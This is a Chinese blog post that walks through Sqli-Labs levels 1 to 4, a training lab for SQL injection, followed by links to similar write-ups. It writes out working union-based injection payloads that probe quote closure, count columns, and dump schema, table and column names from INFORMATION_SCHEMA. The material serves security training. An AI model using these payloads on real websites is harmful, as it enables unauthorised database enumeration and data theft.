Sqli-Labs闯关——更新中

最新推荐文章于 2024-04-11 22:32:24 发布
最新推荐文章于 2024-04-11 22:32:24 发布
阅读量262 收藏
点赞数
分类专栏: Sqli-Labs
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_18669681/article/details/101113143
版权

Sqli-Labs闯关

Less-1

正常访问:
在这里插入图片描述
一、判断

1 and 1=2 //访问正常,不是数值查询

1' //报错,可能为sql字符注入

1' --+//返回正常,所以为单引号字符注入

注:
1、我使用的是 --+来注释sql后面的语句,+的作用是,它在解析的时候会被解析为空格,用来隔开 --与后面语句。
2、#注释也是可行的,但在浏览器的url中,他是被用来指导浏览器动作的,所以http请求并不包含它,只要将它转换为url编码%23.
3、 --’也可以

二、查询
1、查询列数
找一个临界值,这道题3正常,4错误,所以3就是那个临界值,说明这个表就是3列。

1'order by 3 --+

2、联合查询
找一个不存在的页面,查看是否有显示位,如图有2、3两个显示位。(因为mysql_fetch_array();这个函数,只会取出一行,如果要把所有结果取出来要用循环来取了在这儿我们只需要让union select前面的查询结果为空集,则后面的自然就成了第一行了,怎样让前面的成空集呢,只需要将id改为表里没有的,或者不合法的额就行)

999' union select 1,2,3 --+

在这里插入图片描述
2.1、查询库名
group_concat:显示所有内容并且相同内容只显示一次。

999' union select 1,(select group_concat(SCHEMA_NAME) from INFORMATION_SCHEMA.SCHEMATA),3 --+

在这里插入图片描述
2.2、查询表名

999' union select 1,2,(select group_concat(TABLE_NAME) from INFORMATION_SCHEMA.TABLES where TABLE_SCHEMA = (select DATABASE())) --+

在这里插入图片描述
2.3查找字段

999' union select 1,2,(select group_concat(COLUMN_NAME) from INFORMATION_SCHEMA.COLUMNs where TABLE_NAME='emails') --+

注: union官方解释是用来把多个select语句的结果组合到一个结果集合中,且每列的数据类型必须相同。
group_concat也可以用limt替换。例如:999’ union select 1,2,(select TABLE_NAME from INFORMATION_SCHEMA.TABLES where TABLE_SCHEMA = (select DATABASE()) limit 0,1) --+

Less-2

和第一题几乎一样,只是没有了’的闭合

1 order by 3
999 union select 1,2,3
999 union select 1,(select group_concat(SCHEMA_NAME) from INFORMATION_SCHEMA.SCHEMATA),3
999 union select 1,(select group_concat(TABLE_NAME) from INFORMATION_SCHEMA.TABLES),3
999 union select 1,(select group_concat(COLUMN_NAME) from INFORMATION_SCHEMA.COLUMNS where  TABLE_SCHEMA=(select database())),3

Less-3

加’尝试,发现报错,查看报错语句’1’),所以猜测后台的查询语句为(’$id’)。
在这里插入图片描述
构造payload

1') order by 3 --+
999') union select 1,2,3 --+
999') union select 1,(select group_concat(COLUMN_NAME) from INFORMATION_SCHEMA.COLUMNS where TABLE_SCHEMA =(select DATABASE())),3 --+

Less-4

在参数加双引号报错,根据报错信息构造(") --+)
构造payload

") order by 3 --+
") union select 1,2,3 --+
") union select 1,(select group_concat(SCHEMA_NAME) from INFORMATION_SCHEMA.SCHEMATA),3 --+
") union select 1,(select group_concat(TABLE_NAME) from INFORMATION_SCHEMA.TABLES),3 --+
") union select 1,(select group_concat(COLUMN_NAME) from INFORMATION_SCHEMA.COLUMNS where TABLE_SCHEMA = (select DATABASE())),3 --+
江湖人称皮的很
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sql-labs 闯关 5~10
qq_44663230的博客
08-14 1474
sql-labs 第5~10关 盲注系列
小白勇闯sqli-labs-master1-22关
weixin_56594114的博客
07-25 184
id=1 and 1=2 --+ Flase页面异常。id=1 and 1=2 --+ Flase页面异常。id=1 and 1=2 --+ Flase页面异常。id=1 and 1=2 --+ Flase页面异常。id=1 and 1=1 --+ True页面正常。id=1 and 1=1 --+ True页面正常。id=1 and 1=1 --+ True页面正常。id=1 and 1=1 --+ True页面正常。输入admin') and 1=1 # 存在注入。输入正确的用户名密码,显示如下页面。
sqli-labs通关详解(1-20关)
最新发布
2302_81105681的博客
04-11 2617
1.首先判断闭合方式在我之前发布的文章有详细的sql注入判断闭合的方法和原理,参考《sql注入实验原理》在1-6关,我们可以通过在参数后面加\的方法判断闭合\后面的符号就是闭合符号,由此可见第一关的闭合方式为'闭合2.判断字段数当我们输入?id=1' order by 4--+时页面显示没有第4字段,由此判断字段数为3.3.判断回显位因为有三个字段,所以我们使用命令判断出第2,3字段的内容回显在页面4.爆数据库名我们可以将2或者3更改为database()来使页面回显出数据库名。
sql-labs闯关26~31
qq_44663230的博客
09-03 2315
sql-labs闯关26-28a 29~31暂时不做
SQL注入篇——sqli-labs最详细1-40闯关指南
热门推荐
爱国小白帽
01-11 3万+
使用sqllabs游戏系统进行sql注入 1.首先确定用哪些字符可以进行sql注入 一.选择Less­1进入第一关,在网址添加标红内容,显示了用户和密码 http://localhost/sqllabs­master/Less­1/index.php?id=1’ and 1=1 ­­ ­ 把1=1改成1=2,不报错也不显示任何信息,说明可以利用 ’ 字符注入 二.进入第二关,在网址添...
sqli-labs-master 闯关第一关,单引号 ' 字符型注入
qq_39030256的博客
11-18 2667
sqli-labs-master第一关 注:%23为#的url编码 第一关比较简单,在最上面的url后面手动输入http://localhost/sql/sqli-labs-master/Less-1/?id=1可以直接看到用户名密码,同样http://localhost/sql/sqli-labs-master/Less-1/?id=2可以看到另一个用户名密码,以此类推。但是呢,我们要用手动...
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
windows环境下安装sqli-labs
11-04
Windows 环境下安装 sqli-labs 详细教程 Windows Server 2012 环境下安装 sqli-labs 需要具备一定的基础知识和环境准备。在这里,我们将详细介绍如何在 Windows Server 2012 环境下安装 sqli-labs。 环境准备 在...
sqli-labs-master.zip
11-20
最新sqli-labs代码,自己也可以到github下载:https://github.com/Audi-1/sqli-labs
jeakinscheung-sqli-labs-php7-master.zip
03-16
在这个压缩包sqli-labs-php7可能包含一系列精心设计的练习,旨在帮助开发者理解和防御SQL注入攻击。通过这些练习,用户可以学习如何识别SQL注入的迹象,理解它们的工作原理,并掌握防御策略。在实践,这将提高...
sqli-labs(php7.3以上可运行)
01-29
sqli-labs,你可以扮演黑客的角色,尝试找出并利用SQL注入漏洞,这有助于提升你的安全意识和测试技能。渗透测试工具如Burp Suite、Sqlmap等,可以辅助进行自动化扫描和漏洞利用。 五、漏洞环境 sqli-labs提供了...
SQL注入天书 sqli-labs
01-11
SQL注入天书 sqli-labs
xss-labs-master.zip(xss注入通关游戏/靶场)
03-21
经典的xss注入通关游戏,搭建简单。适合网络安全测试人员
【渗透测试】sqli-labs闯关(1-10)
qq_43168364的博客
04-20 545
第一关
sqllabs 闯关wp
wsitcj的博客
07-20 243
Less 1 首先先测试为字符型,并且干扰字符为 单引号 ,所以构造语句如下 http://192.168.9.128/sqli-labs/Less-1/?id=1%27%20--+ 爆字段 http://192.168.9.128/sqli-labs/Less-1/?id=1' order by 3--+ 爆表 不要忘了 group_concat 函数 http://192.168.9.128/sqli-labs/Less-1/?id=999' union select 1,group_con
sqlilabs教程(1-10)
一个安全研究员
04-18 3万+
前言 最近在研究sql注入,只是看书有点无聊(不推荐大家去看《sql注入攻击与防御》,这本书的翻译很奇怪,而且内容不太适合小白,可以当小说看) less-1 根据提示,可以知道只是个单引号注入的题目,我们在参数后面加一个单引号看下效果: 可以看到数据库报错了,最重要的就是能够看懂数据库的错误信息,从错误信息我们可以知道是单引号的匹配出了问题,也就是说我们添加的单引号成功被...
SQLi-LABS(1~10关详解)
CTF小白的博客
09-22 6415
目录SQLi-LABS Less-1查看题目环境测试注入点SQL注入查找列数查询数据库查询数据库的表查表的字段查数据SQLi-LABS Less-2查看题目环境测试注入点SQL注入查找列数查询数据库查询数据库的表查表的字段查数据SQLi-LABS Less-3查看题目环境测试注入点SQL注入查找列数查询数据库查询数据库的表查表的字段查数据SQLi-LABS Less-4查看题目环境测试...
sqli-labs通关wp
D-R0s1的博客
04-11 6471
第一关: 方法一:在id=1后面加一个单引号后发现报错 然后把这个单引号注释掉试一下 使用'or 1=1--+ order by 查列数页面显示正常了。存在注入,先查一下列数 http://127.0.0.1/sqli-labs/Less-1/?id=1%27%20order%20by%203--+ 使用单引号闭合掉一个单引号,在用--+或#或%27注释掉一个,便可以使间的order...
Sqli-labs第一题详解
未完成的歌~的博客
06-10 1963
less1: 根据题目提示为单引号注入,先测试一下 果然报错了,说明我们添加的单引号被数据库成功解析,那我们就可以通过闭合id这个参数 ,然后构造自己的sql语句进行攻击。一般可以使用联合表的方式来提取自己感兴趣的信息(union),但是使用union语句有个前提就是union 后面的语句必须与前面的语句字段数以及类型必须一直,否则数据库会报错。 ...
sqli-labs闯关
10-09
很高兴为您解答关于sqli-labs闯关的问题!sqli-labs是一个用于学习和实践SQL注入的实验室。通过完成各个关卡,您将能够了解和掌握SQL注入的不同技术和攻击方法。 要开始sqli-labs闯关,您可以按照以下步骤进行: 1. 下载sqli-labs:您可以在GitHub上找到sqli-labs的源代码并下载到本地环境。 2. 配置环境:根据sqli-labs的README文件,您需要配置适当的web服务器环境(例如Apache、PHP等)以及数据库(例如MySQL)。 3. 导入数据库:使用提供的SQL脚本文件,导入sqli-labs所需的数据库结构和数据。 4. 开始闯关:访问您的本地服务器,并根据提示依次完成每个关卡。每个关卡都会提供一个具有潜在SQL注入漏洞的页面,您需要利用这些漏洞来获取敏感信息或执行其他恶意操作。 5. 学习和实践:在完成每个关卡后,阅读解释和提示,深入了解所使用的攻击技术和漏洞原理。尝试自己设计和实现一些新的攻击方法。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值